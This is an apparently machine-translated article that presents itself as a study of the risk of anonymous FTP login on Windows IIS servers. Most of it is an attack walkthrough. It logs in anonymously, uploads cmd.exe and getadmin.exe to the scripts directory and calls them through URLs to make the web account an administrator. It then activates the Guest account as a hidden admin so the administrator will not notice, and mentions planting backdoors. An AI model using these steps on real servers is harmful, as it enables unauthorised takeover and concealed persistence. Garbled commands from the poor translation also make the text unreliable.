Study on risks of allowing anonymous login to the FTP server on Windows FTP Server

For network administrators who lack awareness of network security, When configuring a Windows Server, they often only allow the Web server to work and install some common patches. Therefore, the server is considered safe. In fact, this is not the case. When he does not pay attention to the danger of anonymous FTP login, a serious vulnerability may occur. (For more information about this risk, see my article "Association on www.apache.org intrusion".) let's take a practical example to see the danger of anonymous login. In Shell, we can start FTP login: (assume the host is 192.168.0.1) FTP 192.168.0.1 Connected to 192.168.0.1 220 wyztc Microsoft FTP service (Version 3.0 ). User (192.168.0.1none): Anonymous 331 anonymous access allowed, send identity (E-Mail Name) as password. Password: Enter anonymous, guest @, or guest The following is an explanation of this process (in the black body, the user inputs). First, specify the IP address for anonymous login, and then FTP starts to connect to the specified IP address. In the third line, 220 indicates that the connection is successful, and wyztc indicates the NetBIOS Name of the host. If you have a certain understanding of Windows NT/2000, you will know that the host must have an account named IUSR_machinename (iusr_wyztc at this time, it is a general account that a common user browses on this host. Then, enter anonymous and the password anonymous to log on! The first thing after logging on is to use CD to jump to the directory, which is the most difficult. If you can successfully enter the CIG-bin or scripts directory, you will probably get the highest permissions of the entire system. Now we are lucky to have successfully changed the directory, that is, the scripts directory. Next we need to upload some files to this directory (assume that all the files needed below are placed in D: \ hacker \ medium ): Ftp> mput D: \ hacker \ cmd.exe Ftp> mput D: \ hacker \ getadmin.exe Ftp> mput D: \ hacker \ gasys. dll After the display is successful, you can switch to the browser and enter the following command: http: // 192.168.0.1/scripts/getadmin.exe? Iusr_wyztc After more than 10 seconds, the screen is displayed: CGI Error At this time, it is very likely that the iusr_wyztc account is added to the Administrators group, that is, all users who access 192.168.0.1 are administrators. Since access through a browser is already administrator, so we can use net user to add a new account. To prevent the administrator from discovering it, it is best to activate the Guest account! Http: // 192.168.0.1/scripts/cmd.exe? /C20% C: \ winnt \ system32 \ net.exe user guest/active: Yes Http: // 192.168.0.1/scripts/getadmin.exe? Guest In this way, a guest user with the permissions of the Administrators group is successfully added to the host, and it is difficult for the Administrator to be aware of it, which is highly risky. In addition, once you have the Administrator permission, you can place some backdoors so that the host is no longer secure.